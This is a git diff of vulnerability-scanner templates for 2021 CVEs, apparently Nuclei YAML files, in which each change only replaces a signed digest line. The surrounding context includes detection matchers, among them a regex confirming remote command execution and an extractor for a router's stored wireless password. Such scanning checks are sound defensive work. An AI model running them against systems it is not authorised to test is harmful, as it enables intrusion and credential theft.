4b0a004830460221009797e9869eb4d890a89391acc0795035af747ff5958931398e1e077d3f751e79022100d9e31261c293f7762348e4477ec1478a4f49a059fc8e4f1f513e7cfb025edb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index bf34d7d00f..fa759aecbd 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4a0a00473045022100dd206ca7187b6ed469ca7ac639cf6d228f7811e762a78cdf8d6c89bd2defdf690220564ac31e30c8bf0db3d6b80d2f2903b35cb7fe2800fc655540dd2602b9e16acb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e19069ba819c51cbb906a921026dc33a3ea4777dfdfde261cd3eecc4bdf2f60b022100aaff811bc5771e0fa07652ec9066319676fe5ee3edf3f665b969a24c584788c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 7ad3ed0325..3d3f2288f5 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b72158929a2c012eca6ad612ac51258afbd4964fc02c47f4b57368e7cf0bedd30220196fa0ae9b42667f6ed26e6b60c4a741f049d9d05d86ccd0dcdddfcb0b8641c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100faeb3156ba858fe91b062d14f9c7622c40a8e4bba7714ac68ecfea69a67a47a702210092f42640d23791838f59f78bbf5479a1d62585cc6c14413a4c69900d8c77664f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index ee1176c56c..a7a43ae8dc 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -54,4 +54,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100a246c958300ef66facdc279038dc6c006e6f25ee083e21d2b61f2c05f97608bf0221008541a137b7ea439c0235149d62f678ad167cb4386a17f4d1a8f94bc9ca3ff0a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f4700c344cded0ad1a76552a9cf723498805f3c1e80942e9fe989eb0e82b3a190220531cf864289a0b38c68f30881e3ab85365460eef963c5154907c7913af1934e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index c59651b4f6..357e052f09 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f69ec7d4711d599dd40f92495d22b5d93ac3a8db167fe425f7b024ff41d888c5022030ad77de1858a49de1ff57b58e699741fa419442f186dd2a419fa4f433ee8138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009da7701be9e699d6c8cfb7d6d502b67994b8bd7588fd3ba31d79fc30acfb5728022100f0c66ec762d48b3c4f2408958cf655a1d696afca93ae85b154898eb472980951:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index b3819d8e07..fa614240e8 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204a90f383fd73372c3a83f6f9db99d16bf93b8ee0401f22ad6088697eed2957d3022100a2c3bfa5bb7c6bc1edeeea494b9ad3a53468a5b98c9599afc9e4687efb802040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048a943d90a79828cac930da23344723c90a9d4a5727d06e79cd2c6d9c422436e0220447a0b022e0d5f3632a8ffe251db457d67ffd60af93d8fcd1f2bc98c0366fbab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 445e72d342..752a20d476 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -57,4 +57,4 @@ http: - type: regex regex: - "(u|g)id=.*" -# digest: 4a0a00473045022100e84f3b6f3b4431895a29b93f5706225e723a3306c1a1fba02583aeacd7fd802f02200c4f466848e8a98fdcc690f9d5d193830228d10b8759a412ce478da775f757dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d12966b1837ef6ccf87ca6cd55eec8ab9d3b1d87066521af750080b7e25e55ac0220447bd0e552edb4a0fa9e2d31875661ace5d12e7ae449c671af07dd4396739ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index fb6b0b26d1..7d5d610fa2 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -64,4 +64,4 @@ http: group: 1 regex: - '(?m)Pega ([0-9.]+)' -# digest: 4b0a00483046022100bb3eb39482e6bae705caa5decca90a113164e112f360860f41ae3844effb25f3022100cbc7eeb4828f6198e465d2bec97ac6562e793c7c9b76a52e1c830319059eb040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b98e70d836aeed9b41fe32d38b8f9e0a504b1f330bbb68477296e6c3008506a1022100fc8c661b92d136d56605ae5a3207598bacde65e1a1091a2b637972bcfaac7e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index a407f4f20d..f5093d00c2 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210089fc67fdff5afadc5dae929f61d4b47fe38949d2e34156c446d6f3c7933a76d802204f0f7d330a006d1cc55b25bc4ec8d916a9b84081b3612e8a2745c96cae680ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100acd1dd610e280bd360171a8b76652c445a5e7419324dbf618684f72477baff5d022100b980579bec70c2df8580259a9dd5bc729c801c7bea36b518f3933cd07aa9e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index a52441a726..c9da525f28 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -67,4 +67,4 @@ http: - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod' internal: true part: header -# digest: 490a00463044022070f0c04ecf3a9fd26ce9b1691219435ab15f0cd55e185ba3586553743c17e82d02205e3a8a905f69891dc2c1c5b7651a0e91c63afc906d36ebdcd6425467650c5ab1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b8ffedc5739f5ba604e32ca31e2ad0b8cd71050b9f83a9130538b124d0214942022100a2a90ced963bfbebff12db8025096d4055d41266b679c34002ff41e212cc6396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index 81332d6f7a..d21940af9c 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -57,4 +57,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4a0a00473045022100a5eeed4aa78e0ab67f4cc386a9ff9940e1bf79af086160f50cfcb22b541c6ac2022077db0dfda45ed661c6094d7fc069db330ff5e1854903adc81a368722db443bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018a1380d7f6879c31c55d6a19a3ab98cce3b9bb4fc0cfd3f9f24b2a7ac7d1f1c022100d168841e4ff2477c158fb403078752b4f71a8977387de03062fc0fabcd80f130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 5d3ffad92e..d4025871ed 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e683409a42481a5acd5030e9e2be3bff0665fbc807a45864c349a222da9660ed022100dcca043790c8a6718aacdfa104e0129441726aa52264f8642a352b641c03507c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dd30c5e0ce9daa91aafda8c85d31f33bff251466bf3d916601d92ca50549acea022100feac624da9d405aac50e6dfeeef41d8e03baaa2f6a8b76950df8dcca1fa92f17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index b408a5d4aa..e029bd6067 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a004730450220581131eca2ef63301253ff49449855879636bad0e9afd4bbc06992068f084b32022100e42d20545e6f7a6ff2aaa16ec56637fab0aac6462036f42fe6dec31c13882d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b7b1482c51b891f719a691f34c8f18c1b22e51f7767abd5de84aaddb042f352022100e59e7bd6c6eea0222eab89ab3871c6c3b1705b428f0ef77e9c226ae77b8cd0fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 1a04e7cb59..d1aa4dd68e 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c210e8ed390ead0950a65257b8d9b9eed6a403b4234fe537f30c7d0529e9aad70220287ac350869e7bbabb19928f08ff35cffd9808b6371815e3dd78e9e0e64d7cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028bc49aed0dad70ffa655f7fa36fda9a12a2f1f64120ec110f2b6a4b9bc6e701022100aa4a3250ab4373785c6a72a5f0c696f99342c751e8d67ebca79254dbebae9f3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index e60e497167..7cce0fa123 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -59,4 +59,4 @@ http: - "contains_all(header, 'application/xml')" - "status_code == 200" condition: and -# digest: 4a0a00473045022100886a031dbb45bd2585021ea2d7ea51b4bd28d2403afa70cd92fc253a0cb7d5cc022038e2460485ace429f2ae598ca2073cb289cfbe470e28f479fea812fe0e7abdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220117503778b9e94f80db0303e254c6238a929f122689d99b761826065c7a27c03022100f7c4124b95489c9b6397548b504fde7a2fc3d8006995f0b15a8e31cff1ebd1eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 09e96598cf..95f3ff322a 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099d1285740ade18a2d452515bacddf15f7433c6ef658f2b8640ed13791476a7e022048d15f48ee10c490f6696a29b8999737d08894c5770fc0d7973844f075ce1238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a72708c0be1fd9e954352c791a1bb87a9dec643a6487502c81a97930706f3fe5022100acc5e8f1b4f73aede22f2f447085b06786a30e046bb02e803c05feb483f90e05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 8172d8b0d2..97dac0c89f 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d6e6b6ae214509b16663c1be174481963518b40031b35c0ebb448735a7f82f2b022100e97e0b83c9fb1f14e13a75823cc9ebf58a93104083b1efa179e9d0045b26eec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200aa77498a3fc354033b687fad03e0e5ce81021c57bff959969552cb0d9c7f20e022100fdc33c51660f0ba7914598df61940bde9ff15361a513d29fa69ae9dbfaaacbc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index da5eb9f715..bc3136d63f 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -58,4 +58,4 @@ http: - 'status_code_3 == 200' - 'contains(body_3, "Overall Report Summary")' condition: and -# digest: 4b0a00483046022100ece85ed0a3e7f7b62a57b55f6bcc77db0d19a90ecb24f30602d76c261fe03159022100f1481ca4357aab094b84c582f7d0dea2013206ee99a0d03a7ced0a91ecf93b59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ebd0306427622fbd07c1768dfa8ecb58d13a80f7971106070053c48fa894595a022100cd93ac88aa8efefeabbeed69ff2de4875f337e81be596b93045772e4b1554ff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index ee497a4678..36f578c9ca 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7ec4fddabd7c4e5b1c92e0a85de60107cb725edc697e92e2eec4031dc194c4f022100fa8b0762adbb4978b6f4b3b73d9e186a6a3e682452584d6b5cab085151013335:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030f49ac7897c20020fec3fbeab2735c2eb98b51acdadf4143c801dd1f0aaa02e022016519e1fe45a3d1d9a964467e3a0108b55e541bbe8f62068df9b7d2faf3cfc85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index 8222f07071..5e777cc46d 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -59,4 +59,4 @@ http: part: header_3 status: - 200 -# digest: 4a0a0047304502207fdb822293ed117ac244b6204a862e4cd97d7ed5b1a6da75806a95ba16942845022100cbb141a3f60efdaf36945a8ed3e93034fdb9dfa1e221d0ad775fbc7319d814a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022100e1841541a5025ffd6da8020de720413646d494700f511011ae3bb2971314b64c021f722e5fd3aa1cb5637ca501f90b000a932a1ed027eb768fce485acef0529dd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index ff16725ea6..a3db024d50 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -42,4 +42,4 @@ http: - type: dsl dsl: - 'contains(body, "jato.pageSession") && status_code==200' -# digest: 4b0a00483046022100f68e3d98c58d25d03ff3e8158d70a9ad115e6df55f3f08a9e018c8c60ff399bf022100ff6e52bcdc34a7cadbffc2d9434a6273c3c09e60f8b00b28475b6dbd257f383d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018740d51e31f47d235d42ac17499f76c59b88b9553a00cf26236023c5cb4888a022100c360cf59b1ed16012bb0e2528114d01c7dde3c57f2214032e11e5f6a0cdc0333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml index 0ce1ba2632..dd4cd80f70 100644 --- a/http/cves/2021/CVE-2021-29200.yaml +++ b/http/cves/2021/CVE-2021-29200.yaml @@ -64,4 +64,4 @@ http: part: body words: - 'value="responseMessage"' -# digest: 4a0a00473045022100842f48db1f533b0389671ceacc6111d6a44a0afdfc37ff547588aad0db0d2ce2022016235842d399bdd5cd3de0e7a4ffe58712448327b137121c349c382f12604969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100813d5eb87f57f57c8aaabec48c2d93322e130fddfb4efd2548f0e4c76a297184022100a7989c6ba589f72752685e797b8d120362922ec48f77001718ba3eedc3ff73bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 06e5f885b0..db3acd1037 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 201 -# digest: 4b0a00483046022100c7161451646d6a32f88513326984a5378871e42c39116388da64bb5234bb53cc022100a496b69cc17baef6be5e7b210c42daf08c840af4df3b421118b17ae99875b4e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059972e2979656b628d3e8a54cc58c689b33947b93cc382010e811816db56d2be022100f9beab8fd5df408e713824161064279e1ecfa79a857f3043629b6243acabccb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index 42e5b76170..a6d98fc1ad 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201388a197774893b07ac833cc170235546644445e70aaf61aed8f306ab297ab4402201bcd114be7db3bf0c58986c8697b0a3dcfccff01035a9c57014d503de27c864c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100933d70648ac935124b95ffd3d56d1ca89821b2fb5c84c56da904f8ad6c8fca5a022100a8c80f357967fc19263cdb8871ac15642d1d38adfd01683c4a7b823d24cf85e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 78ac537567..52150037d9 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022064bd44c4eb294d3c6ae23aadabeaf4342d055409c28de4185c1568c395efc345022100a32a753e4a9e222c83c6cbb9f73af94180ec63c52b800a77f1b414dfe3cf2272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210086f0b6717e92fde831b9d03965dc5886a532a38fa4b25ccbeac472571b01e68202210091c744cbb3962ce06260a00088c5b0680be0b4a5b9f95a728cf6113059a32fd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index e47de0ddcf..68a3272b38 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -45,4 +45,4 @@ http: part: body words: - "

Interactsh Server

" -# digest: 4b0a00483046022100f125f16d207fd3e53d356fe5c41c9fc12d9d715224fdfcef6af1a426dfe83f56022100e3216df501445badb52c586e7310fb9f642bcb812d9a98de6f3af7b9bd8f2875:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e0fe93b82cf749b6c552a6e20200748f880ce7704f6c3dfa460a5c1dc6968dd022100f380b85f360519ba4cee543f93b074aacd1e45b3f44b57ef1435487d776b61ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index a49b3e4c07..10621f8b2a 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100835e27d67c02978fd0bee911d344ea0062c9e27f3aa7ebaa04152f8a13c5fb1502210086d26f492cb3cba2db01d24993db842112f1f8c56d94e7472d45703b2f8be045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fca1807f589ac8ce4f919bd53e36cbc09ec19b0b598901a28280f2f9c4ebc2240221009702a2f55eb692f242f34b25280a8af7b236bdf103ffaad41df6993c739a340e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 4f9477742d..bfb9148867 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200cdb22c1e900a0bffa916eead65b983954ac251a9cf37416e6a859bea4bfba74022056442b9d14d2fdaee049ad30401ec38f4ec53804185bf6b6b15df8df7f6914d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1b3e6494b9cd0a8ce79cafe3a6710f2c519e0a794837ff0672b7d57aa880c77022062de7ad4f0c57430d491bfae754d755efc7ad51013fc4471a85783e674925b72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index a4285656cd..d1b87de466 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100db7f7118b80efca9c6b7a9e5122c0178b53df35cccac906cc2e4b7b6f6303030022032c0e4a5b50155baed736f13c51adad1904418dc84c461c59235f96e3efa9cae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075e88f3f4bc875a9a0bb1b5fd257624b8a290b5de6c2cc98d0fd95f5d30e286402204d1a6aa490440a2c56dfa06bf3b9ff9bc4daab09bb4441a8d18099d73e218936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index b45286451f..e9907ffc84 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022028b94d02cab2dca2d269c060aa0ff187310ad35a3917e3e696e358740268283f022100c91d9c5464fb7277fab1b843d65f55ca0dd5bc4b90d3e89464eb55cd8062d9b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fae3277c120a798340c690a3e344e0e799fcf9eca7379e63aab9ddc63b78e23a0220205797d5db4b76f6088eddc5f08297cc388aed88676a39dbf9145660d7dfc034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index 5c6d5420f0..f88bf16dde 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -68,4 +68,4 @@ http: part: body words: - 'value="errorMessage"' -# digest: 490a004630440220198d21301bb0cc9c3eca7b3090244d4d6af10af1c8535d48b44443bc399a45a60220120ccdf8a168a43e6464f01e26d331f958ed562b71f2f1a0038dc57f6336595f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220378972d9f55dda8779aa831590d85f9331f5e4e427991c707692706dd817ebe60221008c5efea71f9e6388f6b558b5224deb9ba7bdc8fc81d19ec3e81a76c431152471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 53bf9ec457..359fb713b7 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022054a7b10e32bdea6ad4464c85b29694b0a5fefd2b52c45ea6881458499ce110f6022074ab27b57a2dff0fa2011fb0edc23bda373e4d309c0498cf1470984592c44738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c169b374bf4b77e7573dec6392fde8dc29cd2e80d81945a19eaf6d62b4e6be7e02210099f3f10582c4745692e761e53f1d37c2f001edaabe8a9725fe98ea6f8a98caa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 53a4722127..430af33ded 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220130538944f3f1871ac5aeb68f5998d755e83750ee3dac79cd8b56281de5701bd022001daf8dcf6c2450756a9327e75db2241d0fa9df706b70d735eeb121711653abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220386e41252b4cdca8b218a3f6b861ee08a552be97be25783c1f280a6f976fba2602210098de271bd4f0532af5934b1a781f295f9a524b66cd2b3e831227d145af50b60d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index fdd9c980ba..1238b2759b 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -51,4 +51,4 @@ http: regex: - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' part: body -# digest: 490a00463044022046f96617b2d3f46fb61daf58af99864f5885417b5db82f144672de11b88aee0b02204fc94b7179768b51a7e4285534b628216666e5a2f21f503770ec483aa16e7c3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c934367796b4de85165e7f7999796b343c33ca8aa7a4c87ffa1b0ffa58f05ee0221008c14fe4478d7d5fa39868bdb04a79b70a404e47da93e4f5886e7a6fbf3446bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index e6ee2c214a..6dd8e0502e 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022066b28106254e20b51249bccd4a6755378cf7bd895b20f4a7cd38193a27913081022024e2161db17ae6f5c03b0ef08c86ddc750b8b80e096c106097c2b90aa5d07b83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a47338e93a3380bdd7bc5a4388204db5a900c3e05631373e87c4045eaeec0f28022100f6dc9fae8ee94178b7f3cefefae67dce3a308540eabe3d1b1a82752b753fc2d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index be2feaac93..8a06420388 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100823507dd00b2974bdd4f0260d6614312eb2103421df54d284e01eb0a9b14620d0221008f77848c7872a70284b767b35da931c4650b4726930dcd0501409cb1332098f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ad9daab5f4af096dadceb3890f8babf529bd46030f99690d14439e8a1419880022100da156a23fb23c3bf8e4a73539790df0991e3ec348375300dd51c9f0a70ed980a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index d3bee5e1a9..081082e937 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cfbbf3db9a769e00375b35c64dca16ef254e615b0d407880713bb95445b66706022100bf105f676804f221b9236fe9820577fc487333145d8debcdecbafbc7b620a01f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b78beb00cb5e1cb54a9e2d93c1d9985befc910a93a89ed8e983d69e5cf3c2e5f02207b0787b48190812075455ab8195ffde78e40bdf8cc8c009ee355a2b79e8f6088:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 